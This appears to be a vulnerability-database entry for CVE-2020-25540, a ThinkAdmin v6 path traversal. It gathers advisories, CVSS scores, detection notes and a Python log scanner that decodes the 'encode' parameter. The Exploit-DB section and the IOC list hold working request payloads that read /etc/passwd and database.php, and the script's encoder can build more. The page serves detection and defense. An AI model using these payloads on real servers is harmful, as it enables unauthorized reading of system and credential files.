CVE-2020-25540
Published 2020-09-14
Priority P1 (83) · CVSS 3.1: 7.5 (high) · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 75.88% (99.5th percentile)
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthenticated attacker can read arbitrary files on a remote server via the GET request encode parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thinkadmin | thinkadmin | v6 ≤ 2020.08.03.01 | commit ff2ab47cfabd4784effbf72a2a386c5d25c43a9a |
Version range and fixing commit are taken from the Exploit-DB entry below.
Detection & IOCs (extracted from sources)
URL: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
URL: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
- Detect exploitation attempts by matching GET requests to /admin.html whose query parameter s starts with 'admin/api.Update/get/encode/' followed by an encoded traversal payload.
- A successful exploitation response on a Linux target contains a string matching 'root:.*:0:0:' in the HTTP 200 response body, indicating /etc/passwd was read.
- The vulnerable endpoint is the ThinkAdmin API update handler; monitor for unauthenticated GET requests to 'admin/api.Update/get/encode/' carrying encoded path-traversal strings.
- The vulnerable handler is present in ThinkAdmin v6 up to and including version 2020.08.03.01 only.
- Separate encoded payloads exist for Windows (targeting database.php) and Linux (targeting /etc/passwd); detection rules should account for both payload variants.
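The IOCs above are only useful to a detection engineer once the encode value is turned back into a path. The following is an added example, not code from ThinkAdmin, Exploit-DB, or the Nuclei template: it implements the two-digit base-36 codec the published payloads follow (each GBK byte becomes its ordinal in base 36, zero-padded to two digits), pulls the encode value out of the ThinkPHP `s` route, applies the containment check the vulnerable handler lacks, and runs all of that over constructed access-log lines. It goes a little beyond the page's two payloads by also treating backslashes as separators and by reporting values that do not decode at all. STATIC_ROOT, the client IPs and the log format are assumptions made for the example.

```python
"""Decode and classify ThinkAdmin `encode` parameter values from access logs.

Added example for this page; it is not code from ThinkAdmin, Exploit-DB or
the Nuclei template. The codec reproduces the scheme the published payloads
follow (each byte of the GBK-encoded path becomes its ordinal in base 36,
zero-padded to two digits). STATIC_ROOT, the Apache-style log lines and the
client IPs are constructed for the example.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# The two payloads published on this page, copied verbatim.
LINUX_PAYLOAD = "34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"
# Decodes to public/static/../../config/database"php: byte 0x22 sits where the
# dot of database.php would be expected. Kept exactly as published.
WINDOWS_PAYLOAD = "34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34"

# Assumption: the directory the update handler is meant to read from.
STATIC_ROOT = "public/static/"

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode(text: str) -> str:
    """Forward codec: one two-digit base-36 number per GBK byte."""
    return "".join(BASE36[b // 36] + BASE36[b % 36] for b in text.encode("gbk"))


def decode(encoded: str) -> str:
    """Reverse codec: two base-36 digits -> one byte, then GBK -> text.

    A trailing odd digit is kept as a one-digit chunk, as a str_split(.., 2)
    loop would; a non-base-36 digit or a value above 255 raises ValueError.
    """
    chunks = (encoded[i:i + 2] for i in range(0, len(encoded), 2))
    raw = bytes(int(chunk, 36) for chunk in chunks)
    return raw.decode("gbk", errors="replace")


def extract_encode_param(request_target: str):
    """Return the value after 'encode/' in the ThinkPHP `s` route, else None.

    The route on this page is admin/api.Update/get/encode/<value>: module,
    controller, action, then name/value pairs.
    """
    query = parse_qs(urlsplit(request_target).query)
    segments = query.get("s", [""])[0].split("/")
    if [s.lower() for s in segments[:3]] != ["admin", "api.update", "get"]:
        return None
    pairs = segments[3:]
    for name, value in zip(pairs[0::2], pairs[1::2]):
        if name.lower() == "encode":
            return value
    return None


def escapes_static_root(path: str) -> bool:
    """True when the decoded path does not stay under STATIC_ROOT.

    This is the containment check the vulnerable handler lacks: normalise
    the path (backslashes count as separators too, since the target also
    runs on Windows) and require the result to remain inside the root.
    """
    normalized = posixpath.normpath(path.replace("\\", "/"))
    return not (normalized + "/").startswith(STATIC_ROOT)


REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_log(log_text: str) -> list:
    """One finding per request to the update handler: client, decoded path,
    and whether that path escapes STATIC_ROOT. Values that do not decode are
    still reported (path=None), since they are at least probing the handler."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = extract_encode_param(match.group(1))
        if value is None:
            continue
        try:
            path = decode(value)
        except ValueError:
            path = None
        findings.append({
            "client": line.split(" ", 1)[0],
            "path": path,
            "traversal": path is not None and escapes_static_root(path),
        })
    return findings


def _log_line(ip: str, route: str) -> str:
    # Constructed Apache combined-format line for the example.
    return f'{ip} - - [21/Jul/2024:10:01:02 +0000] "GET /admin.html?s={route} HTTP/1.1" 200 1331'


SAMPLE_LOG = "\n".join([
    _log_line("10.0.0.5", "admin/api.Update/get/encode/" + LINUX_PAYLOAD),
    _log_line("10.0.0.6", "admin/api.Update/get/encode/" + WINDOWS_PAYLOAD),
    _log_line("10.0.0.7", "admin/api.Update/get/encode/" + encode("public/static/app.js")),
    _log_line("10.0.0.8", "admin/index/index"),
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the module prints three findings: the two published payloads are flagged as traversal (the Linux one resolves to /etc/passwd, the Windows one to a path under config/), the benign request for a file under public/static/ is reported but not flagged, and the unrelated route is ignored. A rule that only matches `../` literally would miss this vulnerability entirely, because the traversal never appears in clear text on the wire; decoding first is what makes the match possible.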
CVSS provenance
- NVD v3.1: 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
- NVD v2.0: 5.0 MEDIUM (AV:N/AC:L/Au:N/C:P/I:N/A:N)
- VulnCheck: 7.5 HIGH
GHSA
ThinkAdmin directory traversal vulnerability (CWE-22, HIGH)
ghsa · 2022-05-24
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthenticated attacker can read arbitrary files on a remote server via the GET request encode parameter.
OSV
ThinkAdmin directory traversal vulnerability (HIGH)
osv · 2022-05-24
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthenticated attacker can read arbitrary files on a remote server via the GET request encode parameter.
VulnCheck
thinkadmin thinkadmin: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (HIGH)
vulncheck · 2020 · CVSS 7.5
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthenticated attacker can read arbitrary files on a remote server via the GET request encode parameter.
Affected: thinkadmin thinkadmin
Required Action: Apply remediations or mitigations per vendor instructions, or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References (Shadowserver honeypot statistics):
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-07-21&host_type=src&vulnerability=cve-2020-25540
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-10&host_type=src&vulnerability=cve-2020-25540
- https://dashboard.shadowserver.org/statistics/
No detection rules found.
Exploit-DB
ThinkAdmin 6 - Arbitrarily File Read (HIGH)
exploitdb · 2020-09-15 · CVSS 7.5
---
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540
PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
Nuclei
ThinkAdmin 6 - Local File Inclusion (HIGH)
nuclei · CVSS 7.5
ThinkAdmin version 6 is affected by what the template labels a local file inclusion vulnerability: an unauthenticated attacker can read arbitrary files on a remote server via the GET request encode parameter. The impact is file disclosure (read only), consistent with the C:H/I:N/A:N CVSS vector.
Template:
id: CVE-2020-25540
info:
  name: ThinkAdmin 6 - Local File Inclusion
  author: geeknik
  severity: high
  description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Apply the latest patch or upgrade to a version that is not affected by the vul
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html
- https://github.com/zoujingli/ThinkAdmin/issues/244
- https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/